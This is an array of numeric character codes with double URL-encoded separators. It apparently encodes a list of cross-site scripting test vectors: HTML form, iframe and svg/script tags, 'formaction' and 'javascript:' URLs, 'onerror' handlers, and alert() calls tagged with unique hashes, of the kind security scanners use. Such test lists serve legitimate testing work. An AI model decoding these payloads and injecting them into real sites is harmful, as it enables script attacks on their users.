0,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,53,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56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6,37,50,53,50,67,55,55,37,50,53,50,67,55,54,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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0,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48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3,54,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,56,5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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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7,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,51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3,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54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2,57,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,55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4,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55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3,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,51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5,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48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1,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,49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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52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49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,51,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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6,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52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2,57,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,55,37,50,53,50,67,52,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7,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50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49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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4,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49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0,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,54,50,37,50,53,50,67,56,5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6,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52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3,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48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6,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52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2,57,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57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2,37,50,53,50,67,54,50,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,5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2,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,51,57,37,50,53,50,67,52,49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7,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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2,55,37,50,53,50,67,56,52,37,50,53,50,67,55,51,37,50,53,50,67,56,52,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,57,5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2,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,51,37,50,53,50,67,51,50,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,53,56,37,50,53,50,67,49,50,48,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50